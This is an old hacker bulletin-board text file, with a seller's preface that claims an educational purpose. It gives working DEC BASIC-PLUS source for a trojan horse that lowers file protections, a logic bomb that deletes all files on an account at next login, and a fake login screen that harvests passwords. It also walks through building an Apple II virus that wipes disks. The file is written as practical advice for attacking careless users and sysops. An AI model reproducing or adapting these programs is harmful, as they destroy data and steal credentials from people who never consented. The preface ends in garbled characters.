Filename = BBSFILES.DOC
THE FOLLOWING FILES WERE DOWNLOADED BY ME IN ONE EVENING, USING AN IBM-PC AND
MODEM. THEY WERE DOWNLOADED TO SHOW THE NATURE OF THE INFORMATION READILY
AVAILABLE TO THE THOUSANDS WHO ACCESS HACKER BOARDS - PROVIDED FOR
EDUCATIONAL PURPOSES ONLY, AND NOT TO RECOMMEND OR IMPLY ANY ILLEGAL USE
WHATSOEVER. THESE FILES JUST RELATE TO COMPUTER PHREAKING. THERE ARE MANY
MORE ON PHONE BOXING, WEAPONRY AND EXPLOSIVES, LOCKPICKING - YOU NAME IT!
(we are very interested in increasing this file for future updates of
COMPUTER PHREAKING and, separately, adding similar files for our PHONE COLOR
BOXES, and other technical and survival topics we have interest in (see our
catalog). If you have some good public domain info. for us, please send it
to us in an ASCII file(s), on 5.25" or 3.5" disk (use First Class Mail only),
to: CONSUMERTRONICS, 2011 Crescent Dr., P.O. Drawer 537, Alamogordo, NM
88310. If you require compensation for your help, let us know in advance
what you have and w�a| yot w/u�d lik� for i�)>
D/L1------------------------------
Virus, Trojan Horse, and Decoy Programs:
DEC MAINFRAMES:
===============
The following were devolped and tested on DEC Basic Plus, running under
the RSTS/E Operating system. All have been tested, and were sucessfully used
in the field. However, sucessful use depends on the savvy of the sysop,
legitimate users, and illegitimate ones. They work best on uninformed
(stupid) users and sysops, and when the hacker using them makes them
attractive, as when using trojan horses, or realistic, when using decoys.
TROJAN HORSE:
=============
What follows is a rough listing of the business end of a typical trojan
horse program. While this one just lowers the security of the programs on
the affected account, it could be easily modified to create another account,
or execute any other command. The key is the 'sy$=sys(chr$(14)+"....")'
statement. In BASIC PLUS Programming language, this command lets you execute
a DCL command from within a BASIC Program. Therefore, any DCL command, COPY,
DELETE, PIP, or even BYE could be inserted in the "...." space. I prefer
using PIP *.* <40> /RE, as what that will do is lower the protection codes
low enough for me to see the files on the account. This works with both
sysops and non-privlidged users, so I can benefit whenever someone runs it,
as opposed to something the sysop has to run in order for it to do whatever.
As a plus, if a sysop runs it, certain hidden files on the [1,*] account he/
she's using will become visible, which will, provided you know what you're
doing, enable you to get sysop status. Of course, you could also use PIP
[*,*] *.* <40> /RE, which, if a sysop runs it, will lower the protection of
every file on the system, one would have to add an error checking routine in
case a non-sysop ran it.
10 extend
20 sy$=sys(chr$(14)+"PIP *.* <40> /RE") 30 rem the following would be the
interesting little game you've wrote which 40 rem makes the program look
atractive, and compels the hapless user to 50 rem run it. 60 end
LOGIC BOMB:
===========
The following is an example of a simple logic bomb, which has proven to
Work very well. What it does is create a file on the effected account which
will delete all files on the account upon the next login, it also dumps the
user off the system for good measure, you could remove the logoff procedure,
and not affect program operating, but they then stand a chance of noticing
the little file you've added.
10 extend
20 open "login.com" as file #1
30 print #1,"pip *.* <60> /re"
40 print #1,"delete *.*"
50 close #1
60 sy$=sys(chr$(14)+"bye/f")
70 end
Now, line 30 is optional in this program. I have included it in case the
user has protected his files from accidental deletion. There is one instance
in which this program won't work properly. This is when the defualt language
upon logon isn't DCL, on occasion, some systems have BASIC as the default. In
this case, just add the following line.
25 print #1,"sw dcl"
And you'll switch to DCL before continuing to the rest of the program.
THE DECOY:
==========
This decoy is to be used on local terminals, ones that are connected to
the system via RS-232, such as in schools. It is also the riskiest of these
programs to use. What it basicly does is wait until input, and then act as a
login program, saving the users id# and password. Upon getting it, it informs
the user of an "invalid entry" and then returns control to the system. There
are a number of things to keep in mind when using this program. The first is
to change the program so it looks like your system. The second is to
remember that it runs under the account it's on, therefore you take a risk of
someone hitting [Break] while it's running, and getting into your account.
Finally, due to the BASIC language, you'll only get the project number of the
account (what's before the comma). However, since you'll have the password,
you'll get it in less than 255 tries.
10 extend
20 open "kb:" as file #1%
30 input #1%, z$
40 print "RSTS v8.0-06 MICOM I Job <10> KB31: ";date$(0);" ";time$(0)
50 print
60 print "Username: ";
70 input #1%, u$
80 print "Password: ";
90 sy$=sys(chr$(3))
100 input #1%, p$
110 sy$=sys(chr$(2))
120 print: print "Invalid Entry - Try Again"
130 print: print
140 print "Username: ";
150 input #1%, r$
160 sy$=sys(chr$(3))
170 print "Password: ";
180 input #1%, s$
190 sy$=sys(chr$(2))
200 open "acct.txt" as file #2
210 print #2,u$
220 print #2,p$
230 print #2,r$
240 print #2,s$
250 close #2
260 print: print "Access Denied"
270 sy$=sys(chr$(14)+"bye/f")
280 end
The parts which have to be changed are line 40, and the number of tries
it allows before logging you off. The system I used for devolpment allowed
only two tries, and most I've seen only allow two, but, it isn't always that
way. Finally, remember to save ALL input, for reasons which should be
obvious.
FREE MEMORY:
============
While this program isn't classified as a trojan horse, decoy, logic
bomb, or virus. It's quite interesting, and I've decided to include it. This
program enables you to look at unallocated space on the system's disk. It's
very useful when the sysop is creating and deleting accounts, and in schools
in order to yank deleted files, which happens when students are modifying
programs.
10 open "free.mem" as file #1%
20 put #1%, record nnnnn%
30 close #1%
GENERAL NOTES ON PC VIRUSES
===========================
Writing "funny programs" on PCs is a big pain-in-the-a__. There are two
major reasons why. The first is that most users know their PCs(Personal
Computers in general, not just IBM) like the back of their hand, and that any
wierdness would be immediately noticed, unlike a big multiuser system, where
there are amoungst other users, and basicly isolated in their own little
section of RAM. Secondly, they have to be extremly small, as to be hidden
effectively. While one can write the perfict virus with 64k, try writting
one in a few bytes of space. Personally, I feel the best way to screw over a
computer user is to put a magnet to his disks, but if you want to do it the
hard way, it is possible.
APPLE II+, //e. //c:
====================
The Apple series of computers is one of the simplest machines to
"infect", so to speak. Perhaps this is because it creator was a prima donna
hacker, but who knows. DOS 3.3 has several unsed spots in it, which are
adequete to hide a virus in. They are (in hex) $B78D-$B792 and $BCDF-$BCFF.
You can also, on pre-1983 versions of DOS 3.3, use BA69-BA93. There are also
some spots which aren't unused, but are used for such DOS commands such as
VERIFY, LOCK, UNLOCK, CHAIN, and MAXFILES. The classic virus program on the
Apple a machine language program which counts how many times someone does a
certain function, such as CATALOG, LOAD, or SAVE, and upon reaching a certain
number, initializes the disk. It is based in DOS memory, which means that
once the affected disk is booted, it stays in the machine until power down,
and can affect any disk which is used with said machine. It will also be
transfered to any disk which is initalized by the machine. The actual program
is very simple, provided you know 6502 machine language. What you do is make
a patch to the Command handler entry point for the Catalog command. The
location for the command handler is from $9D1E to $9D55. Look around in
there until you find a string which says "6EA5" this is the entry point for
the Catalog Handler, which is $A56E. Remember that. Change it to the
beginning of your "modification". I recommend $BCDF, since it is the bigest
stretch of memory which is truly safe. You then write a program which will
do an LDX (Load X Register) from a memory location where you're counter is,
say $B78D. You compare that memory to the number of times you want the
command to go through before deletion, say 20 hex. (CPA $20) if the number of
times is greater than the the number in the Compare statement ($20) then jump
to the init subroutine (BPL $4F5A)(The INIT start location is $5A4F), if not,
then Increment the X Register by 1 (INX $01), store it (STX $8DB7), you then
continue with your program by Cataloging the disk (JMP $6EA5). End of
program. I have found this to be one of the best virus programs, as these
things go.
D/L2---------------------------------------